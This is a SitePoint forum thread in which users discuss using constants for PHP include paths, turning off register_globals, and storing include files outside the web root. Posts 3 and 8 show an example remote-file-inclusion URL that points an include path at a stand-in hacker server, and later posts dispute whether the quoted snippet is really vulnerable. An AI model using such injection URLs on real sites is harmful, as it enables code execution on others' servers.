SitePoint Sponsor

User Tag List

Results 1 to 10 of 10
  1. #1
    Non-Member
    Join Date
    Jan 2004
    Location
    Seattle
    Posts
    4,328
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Constant PHP Include Paths

    Zend Studio advised me to use constant paths for my PHP include links, but I don't understand how to do that.

    At present, every include link on my site looks something like this:

    <?php include ($path."a1/inc/toptopics.php"); ?>

    where $path = the relative distance to the site's root, such as ../, ../../ or ../../../../.

    It sounds like I need to use a "site root relative" system, and I've found some tips for doing it, but I don't completely understand it. For example:

    * * * * * * * * * *

    define("INC_PATH", $_SERVER['DOCUMENT_ROOT']."/somefolder/");

    Replace "/somefolder/" with the actual site root relative path within
    your defined site where the include files reside.

    * * * * * * * * * *

    Which raises three questions:

    1. Using <?php include ($path."a1/inc/toptopics.php"); ?>, would I change it to...

    define("INC_PATH", $_SERVER['DOCUMENT_ROOT']."/a1/inc/"); ???

    2. Do I have to substitute a value for DOCUMENT_ROOT, or do I leave it as it is?

    3. And what do I do with this statement - define("INC_PATH", $_SERVER['DOCUMENT_ROOT']."/a1/inc/"); ? Do I insert it in the head section of every page, or do I have to put it in a special file that every page is linked to?

    * * * * * * * * * *

    "Then use is like this:

    include INC_PATH."footer.php";"

    Surely, it doesn't look like that. If my present footer include link is
    <?php include ($path."a1/inc/footer.php"); ?>, would the constant link look something like this?:

    <?php include (INC_PATH."footer.php"); ?> ?

    Thanks.

  2. #2
    $this->toCD-R(LP); vinyl-junkie's Avatar
    Join Date
    Dec 2003
    Location
    Federal Way, Washington (USA)
    Posts
    1,524
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I believe what they mean is for you to specify your path where it looks something like this:
    Code:
    $path = "/home/username/public_html/";
    Music Around The World - Collecting tips, trade
    and want lists, album reviews, & more
    Showcase your music collection on the Web

  3. #3
    SitePoint Enthusiast marcele's Avatar
    Join Date
    May 2004
    Location
    Edmonton
    Posts
    36
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    always use constants for includes

    No vinyl-junkie.. that's NOT what they are talking about!!

    What zend is warning you about is stuff like this:

    NEVER DO
    PHP Code:
    $path'/home/site/';
    include (
    $path.'my_file.php'); 
    If you have register globals enabled and joe hacker can hack you doing this:

    http://www.yoursite.com/yourpage.php?path=http://www.myhackerserver/';

    The hacker has a file in his web root called my_file.php ... just like yours.
    If the hacker has told his web server to NOT parse PHP ... then HIS page gets included , and his code gets executed on YOUR webserver!!!!!

    THE RIGHT WAY
    PHP Code:
    define('PATH','/home/site/');
    include (
    PATH.'my_file.php'); 
    That way joe hacker can never override a Constant and run his own code on your server..

    Note .. Always have register globals turned off in your php.ini file also...

  4. #4
    $this->toCD-R(LP); vinyl-junkie's Avatar
    Join Date
    Dec 2003
    Location
    Federal Way, Washington (USA)
    Posts
    1,524
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks for setting me straight on that. It's one of the reasons that I really enjoy this forum.

    I have a question about what you said regarding having register globals off. My site is on shared hosting and has register globals on. Am I supposed to be able to see and edit my php.ini file to turn that off? If not, how do I go about doing it?

    Guess you can tell I'm still a little inexperienced, huh?
    Music Around The World - Collecting tips, trade
    and want lists, album reviews, & more
    Showcase your music collection on the Web

  5. #5
    o_O O_o BlueFire2k5's Avatar
    Join Date
    Mar 2003
    Location
    Sioux Falls, SD
    Posts
    475
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by vinyl-junkie
    Thanks for setting me straight on that. It's one of the reasons that I really enjoy this forum.

    I have a question about what you said regarding having register globals off. My site is on shared hosting and has register globals on. Am I supposed to be able to see and edit my php.ini file to turn that off? If not, how do I go about doing it?

    Guess you can tell I'm still a little inexperienced, huh?
    You can put this in your .htaccess file:
    Code:
    php_flag register_globals off

  6. #6
    $this->toCD-R(LP); vinyl-junkie's Avatar
    Join Date
    Dec 2003
    Location
    Federal Way, Washington (USA)
    Posts
    1,524
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks. I'll give that a try.

    Now, if I could bother you with one more php.ini related question. There is a paragraph in Kevin Yank's book (page 166) regarding includes and how to make them more secure that reads as follows:
    ...you should put security-sensitive code into an include file, and place that file into a directory that's not part of your Web server's directory. If you add that directory to your PHP include_path setting (in php.ini), you can refer to the files directly with the PHP include function, but have them tucked away safely somewhere where your Web server can't display them as Web pages.
    Exactly how do I do that?
    Music Around The World - Collecting tips, trade
    and want lists, album reviews, & more
    Showcase your music collection on the Web

  7. #7
    Romans 12:2 codyrockx's Avatar
    Join Date
    Jul 2003
    Location
    Newberg, Oregon
    Posts
    422
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    you would place the include below the public_html folder,
    so you could place it in say, /home/user/secure/include.php
    and then you would have the include:
    PHP Code:
    define('PATH','/home/user/secure/');
    include(
    PATH 'include.php'); 

    what he is saying is you need to place them in a folder where you cannot view them from the web, which the ones you can are the public_html, public_ftp, and www folders
    -cody
    Codyrobert.com - Designer and Developer

  8. #8
    SitePoint Enthusiast andysmith's Avatar
    Join Date
    Jul 2003
    Location
    Wolverhampton, UK
    Posts
    60
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by marcele
    No vinyl-junkie.. that's NOT what they are talking about!!

    What zend is warning you about is stuff like this:

    NEVER DO
    PHP Code:
    $path'/home/site/';
    include (
    $path.'my_file.php'); 
    If you have register globals enabled and joe hacker can hack you doing this:

    http://www.yoursite.com/yourpage.php?path=http://www.myhackerserver/';

    The hacker has a file in his web root called my_file.php ... just like yours.
    If the hacker has told his web server to NOT parse PHP ... then HIS page gets included , and his code gets executed on YOUR webserver!!!!!

    THE RIGHT WAY
    PHP Code:
    define('PATH','/home/site/');
    include (
    PATH.'my_file.php'); 
    That way joe hacker can never override a Constant and run his own code on your server..

    Note .. Always have register globals turned off in your php.ini file also...
    But if $path is defined in the script, anything set by REQUEST globals (including those set in the URL) would have no impact on the script?

  9. #9
    $this->toCD-R(LP); vinyl-junkie's Avatar
    Join Date
    Dec 2003
    Location
    Federal Way, Washington (USA)
    Posts
    1,524
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by andysmith
    But if $path is defined in the script, anything set by REQUEST globals (including those set in the URL) would have no impact on the script?
    I believe that is correct. You must add something like a $_GET or $_POST into your script to retrieve the URL variables. At least that's what I found I had to do after making the script changes recommended in this thread.
    Music Around The World - Collecting tips, trade
    and want lists, album reviews, & more
    Showcase your music collection on the Web

  10. #10
    SitePoint Wizard samsm's Avatar
    Join Date
    Nov 2001
    Location
    Atlanta, GA, USA
    Posts
    5,011
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by andysmith
    But if $path is defined in the script, anything set by REQUEST globals (including those set in the URL) would have no impact on the script?
    That is definitely correct. Even with register globals on, a variable defined in the script will override the one entered by the user. Therefore, I believe the "never do" scenario in post 3 does not pose any risk at all.

    Don't believe me? Try this:
    PHP Code:
    $_GET['sample'] = 'precedence';
    echo 
    $_GET['sample']; 
    However, the "define" methodology makes perfect sense so there is no reason not to use it.
    Using your unpaid time to add free content to SitePoint Pty Ltd's portfolio?


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •